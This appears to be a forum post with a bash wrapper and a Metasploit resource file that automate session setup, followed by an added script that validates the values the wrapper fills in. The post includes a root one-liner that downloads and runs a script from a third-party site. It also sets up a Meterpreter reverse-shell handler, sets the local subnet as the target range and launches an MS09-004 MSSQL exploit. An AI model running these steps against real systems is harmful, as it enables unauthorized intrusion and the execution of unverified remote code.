Are you tired of doing the same things over and over again in msf3, especially setting basic options?
Here is what I use for my daily msf3 usage.
Copy & paste the basic shell script below, along with the msf3.base content, and just change the paths to reflect your environment!
OR, for the lazy ones...
run this in a root terminal:
Code:
mkdir -p /opt/_PRODUCTION/_LOGS/msf3 /opt/_HOMEGR0WN/bin/CONF/ && cd /opt/_HOMEGR0WN/bin && wget -q http://zerohat.de/_shared_files/start_msf3 && cd /opt/_HOMEGR0WN/bin/CONF && wget -q http://zerohat.de/_shared_files/msf3.base && export PATH=$PATH:/opt/_HOMEGR0WN/bin && start_msf3

Starting msf3 via a simple bash script; below is my start-msf3 script
(it will look for your active network interface and change basic msf3 options in a resource file called msf3.base)
Note: SMAC is needed for auxiliary scanner/discovery/arp_sweep, if you want to do an ARP sweep
Code:
#!/bin/bash
#
# base vars
#
LOG="/opt/_PRODUCTION/_LOGS/msf3"
# interface carrying the default route (flags "UG" in the routing table)
ACTIVE_IF=$(netstat -anr | grep UG | awk -F" " '{print $8}')
IF_IP=$(ifconfig "$ACTIVE_IF" | grep "inet addr" | gawk -F: '{print $2}' | cut -d" " -f1)
IF_MAC=$(macchanger -s "$ACTIVE_IF" | gawk -F" " '{print $3}')
IP_SUBNET=$(echo "$IF_IP" | cut -d"." -f1-3)
#
# change necessary vars in the base msf3 resource file
#
sed -i "s/^setg LHOST.*/setg LHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg RHOSTS.*/setg RHOSTS $IP_SUBNET.0\/24/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SHOST.*/setg SHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SMAC.*/setg SMAC $IF_MAC/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
# msf3.base holds "set INTERFACE ...", so match both "set" and "setg"
sed -i "s/^setg\{0,1\} INTERFACE.*/set INTERFACE $ACTIVE_IF/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
cd /opt/metasploit3/msf3
printf "\n\n"
read -p ">> Should we update msf3 (y/n)? _ " -e update
# quoted so that an empty answer does not break the test
if [ "$update" == "y" ]; then
    printf "\n...be patient, takes a moment to update..\n"
    svn update
fi
./msfconsole -r /opt/_HOMEGR0WN/bin/CONF/msf3.base

Here is the content of the /opt/_HOMEGR0WN/bin/CONF/msf3.base file:
(remember, our msf3-startup script will change some of these vars every time you call it)
Note: Logs will go into your ~/.msf3/logs directory!
Code:
db_driver sqlite3
db_destroy /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
db_create /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
load db_tracker
setg SessionLogging true
setg ConsoleLogging true
setg LHOST x.x.x.x
setg RHOSTS x.x.x.x/24
setg SHOST x.x.x.x
setg SMAC 00:xx:ca:20:xx:xx
set INTERFACE wlan1
setg THREADS 50
setg LPORT 445
setg OUTPUTPATH /opt/_PRODUCTION/_LOGS/msf3
use multi/handler
exploit -j -z -p windows/meterpreter/reverse_tcp
back
setg
jobs -l

Also you can add your favorite exploit to start with, like:
use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
exploit -j -z -o RHOST=x.x.x.x,DisablePayloadHandler=true -p windows/shell/reverse_tcp
(we also disable the current payload handler in order to use a different one for this exploit)
/have fun, brtw2003
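
The start script above writes whatever netstat, ifconfig and macchanger print straight into msf3.base, so an empty or multi-line result (no default route, or two of them) leaves a broken resource file. The following is an added example, not part of the original post, that validates the values first and renders a separate file; the helper names `is_ipv4`, `is_mac` and `render_rc`, the output name msf3.rc and the sample addresses are assumptions made for the example.

```shell
#!/bin/sh
# Added example: validate detected values, then render a separate resource file.
# is_ipv4, is_mac and render_rc are hypothetical helper names.

is_ipv4() {
    case $1 in ''|*[!0-9.]*) return 1 ;; esac      # also rejects multi-line output
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs   # split into octets
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

is_mac() {
    case $1 in ''|*[!0-9A-Fa-f:]*) return 1 ;; esac
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# render_rc TEMPLATE OUTPUT IFACE IP MAC
# Writes OUTPUT only when every value is well-formed; TEMPLATE is never modified.
render_rc() {
    [ -r "$1" ] || { echo "cannot read template: $1" >&2; return 1; }
    case $3 in ''|*[!A-Za-z0-9._-]*) echo "bad interface: '$3'" >&2; return 1 ;; esac
    is_ipv4 "$4" || { echo "bad IPv4 address: '$4'" >&2; return 1; }
    is_mac "$5"  || { echo "bad MAC address: '$5'" >&2; return 1; }
    sed -e "s|^setg LHOST .*|setg LHOST $4|" \
        -e "s|^setg RHOSTS .*|setg RHOSTS ${4%.*}.0/24|" \
        -e "s|^setg SHOST .*|setg SHOST $4|" \
        -e "s|^setg SMAC .*|setg SMAC $5|" \
        -e "s|^setg\{0,1\} INTERFACE .*|set INTERFACE $3|" \
        "$1" > "$2"
}

# Constructed demo: a template with the placeholder values shown in msf3.base,
# filled with documentation-range sample values (not real hosts).
demo_dir=$(mktemp -d)
printf '%s\n' 'setg LHOST x.x.x.x' 'setg RHOSTS x.x.x.x/24' \
    'setg SHOST x.x.x.x' 'setg SMAC 00:xx:ca:20:xx:xx' 'set INTERFACE wlan1' \
    > "$demo_dir/msf3.base"
render_rc "$demo_dir/msf3.base" "$demo_dir/msf3.rc" eth0 192.0.2.10 02:00:00:00:00:01
cat "$demo_dir/msf3.rc"
```

Because the template is left untouched, msfconsole would be started with `-r` pointing at the rendered file instead of msf3.base.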


